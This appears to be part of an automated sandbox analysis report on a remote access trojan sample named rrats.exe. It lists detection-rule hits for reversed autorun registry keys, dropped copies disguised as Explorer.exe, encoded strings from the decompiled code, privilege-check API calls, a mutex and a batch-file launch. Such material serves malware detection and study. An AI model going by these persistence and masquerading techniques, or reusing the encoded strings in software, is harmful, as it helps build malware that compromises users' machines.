                        Source: C:\Users\user\Desktop\rrats.exeCode function: String function: 00CBF5F0 appears 31 times
                        Source: C:\Users\user\Desktop\rrats.exeCode function: String function: 00CBEB78 appears 39 times
                        Source: C:\Users\user\Desktop\rrats.exeCode function: String function: 00CBEC50 appears 56 times
                        Source: rrats.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: 00000010.00000002.4490902100.0000000002B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: Process Memory Space: Explorer.exe PID: 7356, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: C:\Users\user\AppData\Local\explore.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: rrat.exe.4.dr, xwAfxDQxndGJirq.csBase64 encoded string: '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
                        Source: Explorer.exe.5.dr, xwAfxDQxndGJirq.csBase64 encoded string: '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
                        Source: 5.2.rrat.exe.26db1a0.0.raw.unpack, xwAfxDQxndGJirq.csBase64 encoded string: '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
                        Source: explore.exe.16.dr, xwAfxDQxndGJirq.csBase64 encoded string: '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
                        Source: Explorer.exe.5.dr, FCIYoaYgcuBXAD.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: 5.2.rrat.exe.26db1a0.0.raw.unpack, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 5.2.rrat.exe.26db1a0.0.raw.unpack, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: Explorer.exe.5.dr, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Explorer.exe.5.dr, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: rrat.exe.4.dr, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: rrat.exe.4.dr, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 5.2.rrat.exe.26db1a0.0.raw.unpack, FCIYoaYgcuBXAD.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: explore.exe.16.dr, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: explore.exe.16.dr, WfNNYSCGoRo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: rrat.exe.4.dr, FCIYoaYgcuBXAD.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: explore.exe.16.dr, FCIYoaYgcuBXAD.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@43/19@2/3
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CA6C74 GetLastError,FormatMessageW,0_2_00CA6C74
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CBA6C2
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeFile created: C:\Users\user\AppData\Roaming\Explorer.exeJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeMutant created: \Sessions\1\BaseNamedObjects\RRAT_nMo7Zfs0N
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5524:120:WilError_03
                        Source: C:\Users\user\Desktop\rrats.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat" "
